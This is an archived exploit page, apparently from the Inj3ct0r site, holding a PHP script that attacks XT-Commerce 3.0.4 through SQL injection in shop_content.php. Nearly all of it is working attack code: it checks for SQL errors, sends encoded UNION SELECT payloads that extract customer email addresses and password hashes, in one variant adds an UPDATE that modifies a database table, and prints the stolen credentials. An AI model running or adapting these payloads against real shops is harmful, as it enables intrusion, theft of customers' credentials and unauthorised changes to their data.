XT-Commerce Version 3.0.4 SQL Injection Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>XT-Commerce Version 3.0.4 SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
XT-Commerce Version 3.0.4 SQL Injection Exploit
===============================================
<?php
# Exploit Title: XT-Commerce
# Date: 25/7/2010
# Author: TA4G – S8T@hotmail.com
# Software Link: http://www.xt-commerce.info/index.php?_m=downloads&_a=viewdownload&downloaditemid=19
# Version: 3.0.4
# Google dork : n/a
# Platform / Tested on: Ubuntu Linux
# Category: webapps/0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### ArHack.NeT ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$check_vuln = file_get_contents($argv[1]."shop_content.php/coID/-1′");
if(strpos($check_vuln,"You have an error in your SQL syntax") != false)
{
print("Site is exploitable.nn");
}
else
{
$getCont = file_get_contents($argv[1]);
if(strpos($getCont,"xt:Commerce") == false)//Check if xt:commerce software
{
print("Copyright of software not found.n");
print("Site is not exploitable.nn");
exit(0);
}
else
{
print("Site is not exploitable.nn");
print("Exploiting stopped.nn");
exit(0);
}
}
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%20%
271");
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
20200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%
20%271");
}
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
200%2C1%3B–%20UPDATE%20content_manager%20SET%20languages_id%20%3D%20%272%27%
20where%205%3D%271");
}
//split of return
$innerTitle = substr($innerHTML,strpos($innerHTML,"<title>")+7,(strpos($innerHTML,"</title>")-(strpos
($innerHTML,"<title>")+7)));
if(strpos($innerTitle,";") != false)
{
$innerUser = substr($innerTitle,0,strpos($innerTitle,";"));
$innerMD5 = substr($innerTitle,strpos($innerTitle,";")+1,strlen($innerTitle));
$innerMD5 = substr($innerMD5,0,strpos($innerMD5,";"));
print("Username:n");
print($innerUser."n");
if(strlen($innerMD5)==32)
{
print("Hash is MD5:n");
print($innerMD5."n");
}
else
{
print("Is not MD5:n");
print($innerMD5."n");
}
}
else
{
print("Error, stop executing.nn");
}
?>
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-26]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13476
Leave a Reply